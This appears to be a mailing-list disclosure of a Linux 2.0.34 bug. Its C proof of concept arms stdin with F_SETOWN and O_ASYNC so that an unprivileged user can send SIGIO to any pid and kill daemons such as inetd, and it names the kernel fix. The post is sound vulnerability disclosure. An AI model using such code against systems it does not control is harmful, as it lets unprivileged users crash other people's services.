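I just saw this mentioned on linux-kernel and confirmed it:

#define _GNU_SOURCE  /* O_ASYNC is a BSD/GNU extension; this must precede the includes */
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/*
 * Proof of concept: make stdin (fd 0) deliver SIGIO to an arbitrary pid.
 *
 * F_SETOWN names the owner that receives I/O signals for the descriptor and
 * O_ASYNC arms asynchronous notification, so the Enter keypress makes the
 * kernel send SIGIO to that owner.  On the affected kernel (2.0.34) the owner
 * check in send_sigio() was inverted, so an unprivileged caller could signal a
 * process it has no right to kill.
 *
 * argv[1]: target pid (a negative value names a process group, as F_SETOWN
 * allows).  Exit status is non-zero on a usage error, an unparseable pid, or
 * a failed fcntl(); the original returned 0 on a usage error and never checked
 * the fcntl() results.
 */
int main(int argc, char *argv[])
{
    char *end;
    long pid;
    int flags;

    if (argc != 2) {
        fputs("Please specify a pid to send signal to.\n", stderr);
        return EXIT_FAILURE;
    }

    /* strtol instead of atoi: reject junk and out-of-range values explicitly. */
    errno = 0;
    pid = strtol(argv[1], &end, 10);
    if (end == argv[1] || *end != '\0' || errno == ERANGE ||
        pid > INT_MAX || pid < INT_MIN) {
        fprintf(stderr, "Invalid pid: %s\n", argv[1]);
        return EXIT_FAILURE;
    }

    if (fcntl(0, F_SETOWN, (int)pid) == -1) {
        perror("fcntl(F_SETOWN)");
        return EXIT_FAILURE;
    }

    flags = fcntl(0, F_GETFL, 0);
    if (flags == -1) {
        perror("fcntl(F_GETFL)");
        return EXIT_FAILURE;
    }
    if (fcntl(0, F_SETFL, flags | O_ASYNC) == -1) {
        perror("fcntl(F_SETFL, O_ASYNC)");
        return EXIT_FAILURE;
    }

    printf("Sending SIGIO - press enter.\n");
    getchar();

    /* Disarm before exiting so the terminal is not left in async mode. */
    if (fcntl(0, F_SETFL, flags & ~O_ASYNC) == -1)
        perror("fcntl(F_SETFL, ~O_ASYNC)");

    printf("SIGIO send attempted.\n");
    return 0;
}

From a normal user account this can kill the inetd process under Linux 2.0.34 by sending it a SIGIO (the default action for SIGIO is to terminate the process, so any daemon that does not handle it dies). Very bad. The fix is to invert !euid to euid in fs/fcntl.c:send_sigio(); the line number is approximately 139. Reviewer note: later kernels record the caller's credentials at F_SETOWN time and apply the same permission checks as kill(2) when delivering the signal, so this should not work against an unrelated privileged process on a current kernel — verify before relying on it either way. David.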